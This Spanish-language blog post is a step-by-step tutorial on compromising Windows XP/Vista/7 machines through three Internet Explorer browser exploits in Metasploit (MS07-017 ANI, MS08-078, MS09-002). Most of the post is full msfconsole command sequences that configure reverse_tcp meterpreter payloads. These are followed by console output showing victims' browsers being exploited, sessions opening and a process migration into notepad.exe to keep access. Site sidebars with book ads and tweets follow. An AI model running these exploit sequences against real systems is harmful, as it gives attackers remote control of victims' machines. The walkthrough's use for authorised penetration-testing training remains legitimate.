Penetrando Sistemas Windows con MetaSploit FrameWork – Parte I
CONCEPTOS BASICOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte I
En esta ocasión se indicarán algunas vulnerabilidades que pueden ser empleadas con el fin de comprometer sistemas bajo plataformas Windows usando MetaSploit Faremwork, cabe anotar que casi todos los exploits que se detallan a continuación, funcionan correctamente en casi todas las implementaciones de Windows, pero dependen directamente de la versión de IE instalada en la maquina objetivo.
Vulnerabilidad ANI
Se trata de una vulnerabilidad tradicional de buffer overflow que afecta a maquinas bajo Windows XP, 2003, 2008 y Vista, aprovechando una dirección de memoria vulnerable a ser sobrescrita y manipulada al gusto del atacante (o expresado de un modo mas adecuado, al gusto del programador) que es común a navegadores web tales como IE 6.X, IE 7.X, Opera, Safari y Firefox, su uso desde Metasploit resulta muy sencillo, como la mayoría de exploits desde la consola de MSF.
| msf exploit(handler) > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize msf exploit(ms07_017_ani_loadimage_chunksize) > show options Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / yes The URI to use. Exploit target: Id Name — —- 0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 4444 LPORT => 4444 msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVPORT 8080 SRVPORT => 8080 msf exploit(ms07_017_ani_loadimage_chunksize) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.34:8080/ [*] Server started. |
Una vez la víctima entra en la dirección donde se encuentra en ejecución el servicio MetaSploit, se envía el stager y se abre una sesión meterpreter.
| msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 192.168.1.36:49280… [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.36:49280… [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.36:49281) at Thu May 12 22:44:24 +0200 2011 |
VULNERABILIDAD EN DATA BINDING
Vulnerabilidad sobre las funciones de Data Binding XML de Internet Explorer 6.0, 7.0 y 8.0, el modulo existente en Metasploit para explotar esta vulnerabilidad utiliza una técnica llamada “Inyección de DLL en memoria con .NET” que crea un objeto vtable en una ubicación conocida con todos los métodos de dicho vtable apuntando hacia el payload del atacante, dado que el segmento .text (segmento ejecutable en Assembly) de la DLL de .NET no es escribible, un stub de código predefinido es utilizado para copiar el payload en un nuevo segmento de memoria y continuar la ejecución desde allí.
| msf > use exploit/windows/browser/ms08_078_xml_corruption
msf exploit(ms08_078_xml_corruption) > show options Module options (exploit/windows/browser/ms08_078_xml_corruption): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description —- ————— ——– ———– EXITFUNC process yes Exit technique: seh, thread, none, process LHOST 192.168.1.33 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name — —- 0 Automatic msf exploit(ms08_078_xml_corruption) > set LPORT 4446 LPORT => 4446 msf exploit(ms08_078_xml_corruption) > set SRVPORT 8082 SRVPORT => 8082 msf exploit(ms08_078_xml_corruption) > set URIPATH / URIPATH => / msf exploit(ms08_078_xml_corruption) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.33:4446 [*] Using URL: http://0.0.0.0:8082/ [*] Local IP: http://192.168.1.33:8082/ [*] Server started. |
Cuando el navegador de la victima accede a la ruta anteriormente establecida, se envía la DLL y comienza la corrupción de memoria, si resulta exitosa dicha inyección, se obtiene una sesión meterpreter.
| msf exploit(ms08_078_xml_corruption) >
[*] Sending DLL to 192.168.1.40:49229… [*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229… [*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229…[*] Sending exploit HTML to 192.168.1.40:49229 token=dll… [*] Sending stage (749056 bytes) to 192.168.1.40 [*] Meterpreter session 2 opened (192.168.1.33:4446 -> 192.168.1.40:49230) at Sat May 14 22:52:28 +0200 2011 |
Memory Corruption CfunctionPointer IE 7 (Windows XP/Vista)
Se trata de una vulnerabilidad relacionada con la función CfunctionPointer que consiste básicamente, en el aprovechamiento de un fallo de implementación de dicha función en donde se intenta acceder a memoria sin inicializar, de esta forma un atacante podría acceder remotamente, explotar esta vulnerabilidad y ejecutar código arbitrario en el sistema con los privilegios de la víctima.
| msf > use exploit/windows/browser/ms09_002_memory_corruption
msf >exploit(ms09_002_memory_corruption) > show options Module options (exploit/windows/browser/ms09_002_memory_corruption): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name — —- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms09_002_memory_corruption) > set LPORT 4445 LPORT => 4445 msf exploit(ms09_002_memory_corruption) > set SRVPORT 8082 SRVPORT => 8082 msf exploit(ms09_002_memory_corruption) > set URIPATH / URIPATH => / msf exploit(ms09_002_memory_corruption) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4446 [*] Using URL: http://0.0.0.0:8082/ [*] Local IP: http://192.168.1.34:8082/ [*] Server started. |
Una vez un cliente ha entrado desde el navegador a la ruta donde se encuentra el servicio de metasploit ejecutándose, inmediatamente se obtiene una sesión meterpreter. Como característica interesante, el exploit intenta migrar el proceso a otro distinto con el fin de garantizar el acceso en el caso de que la víctima cierre el navegador.
| msf exploit(ms09_002_memory_corruption) >
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 192.168.1.36:49356… [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 2 opened (192.168.1.34:4446 -> 192.168.1.36:49357) at Fri May 13 00:17:32 +0200 2011 [*] Session ID 2 (192.168.1.34:4446 -> 192.168.1.36:49357) processing InitialAutoRunScript ‘migrate -f’ [*] Current server process: iexplore.exe (1172) [*] Spawning a notepad.exe host process… [*] Migrating into process ID 1896 [*] New server process: notepad.exe (1896) |
Servicios en TheHackerWay
Descubre los productos y servicios enfocados a la seguridad informática que ofrecemos en TheHackerWay
Deep web: Privacidad y anonimato.
Compra el libro de "Deep Web: TOR, FreeNET & I2P - Privacidad y Anonimato"
Hacking con Python
Compra el libro de "Hacking con Python".
Python para Pentesters
Compra el libro de "Python para Pentesters".
Número de Visitas:
Sobre Adastra:
Soy un entusiasta de la tecnología y la seguridad informática, me siento atraído principalmente por la cultura y los fundamentos del Gray Hat Hacking.
Soy una persona afortunada de poder dedicar mi tiempo y energía en hacer lo que me apasiona, aprendiendo y compartiendo lo aprendido. Con bastante frecuencia iré publicando entradas relacionadas con estudios y técnicas que he ido asimilando a lo largo de mis investigaciones, todas enfocadas a las diferentes facetas de la informática con un énfasis especial en la seguridad.
Saludos y Happy Hack!
Twitter Adastra
- RT @Securizame: ¡Mañana tenemos el entrenamiento 100% práctico de #DFIR y Análisis Forense con @lawwait! ¿Todavía no tienes tu plaza? ¡Aún… 15 hours ago
- RT @Securizame: Recordad que ya está disponible nuestro plan de formación de hacking ético con @jdaanial para el periodo septiembre-diciemb… 15 hours ago
- @JLNavarroAdam @Securizame Muchas gracias José! 1 day ago
- RT @JLNavarroAdam: Imprescindible. Formación de calidad con el equipo de @Securizame y de la mano del maestro Dani @jdaanial https://t.co/R… 1 day ago
- RT @Securizame: Entrenamiento 100% práctico de #DFIR y Análisis Forense con @lawwait ¡Pon a prueba tus habilidades y gana experiencia en re… 1 day ago
- RT @Securizame: ¿Ya aprovechásteis el descuento? ¡No os lo penséis demasiado! Si ahora no tenéis tiempo, pero queréis hacer un curso online… 1 day ago
- RT @Securizame: No importa si no hiciste el entrenamiento 1, ¡Son independientes! El entrenamiento 100% práctico de #DFIR y Análisis Forens… 1 day ago
Entradas recientes
- Seguridad informática en 50 días – YOUR hacker way
- CURSOS ONLINE DE CIBERSEGURIDAD QUE SECURÍZAME TIENE PARA EL BLACK FRIDAY
- Actividades básicas a desempeñar en un proceso de explotación y post-explotación.
- Plan de formaciones sobre Hacking en Securízame y certificación RTCP (Red Team Certified Professional)
- Pentesting contra aplicaciones en nodejs – Parte 3
- Pentesting contra aplicaciones en node.js – Parte 2.
- Oferta de formación en Securízame sobre hacking ofensivo (Red Team)
- Pentesting contra aplicaciones en node.js – Parte 1.
- IRCP: la primera certificación de ciberseguridad práctica especializada en Respuesta ante Incidentes y Análisis Forense Digital
- Evadiendo no-exec stacks con técnicas ret2libc
- Vuelve el patito low cost, ahora grazna como un USB Rubber Ducky original
- Get back the low cost duck, now squawks like an original USB Rubber Ducky
- BadUSB Ultra Low Cost
- Cómo inyectar malware en una aplicación Android legítima.
- ¿La externalización de servicios IT quita puestos de trabajo?
Entradas
Calendario de Entradas
Blogs Interesantes
Mensajes y Páginas Populares
- 10 sitios en la deep web de TOR que podrían interesarte - Parte 1 de 3
- 20 sitios en la web profunda de TOR que te podrían interesar
- ¿Qué es el Hacking?
- 10 Sitios en la deep web que podrían interesarte - Parte 2 de 3
- Hydra, Ataques de Fuerza Bruta
- 7 ideas de desarrollo de software enfocadas a la seguridad informática para el 2015
- 21 Blogs sobre seguridad informática que deberías conocer, en castellano.
- Conceptos Basicos de Meterpreter - MetaSploit Framework
- Preservando el Anonimato y Extendiendo su Uso – Conceptos Esenciales de TOR – Parte I
- Conceptos Básicos de Nikto - Técnicas de escaneo de Servidores y Aplicaciones Web
Categorías
adastraTop Clicks
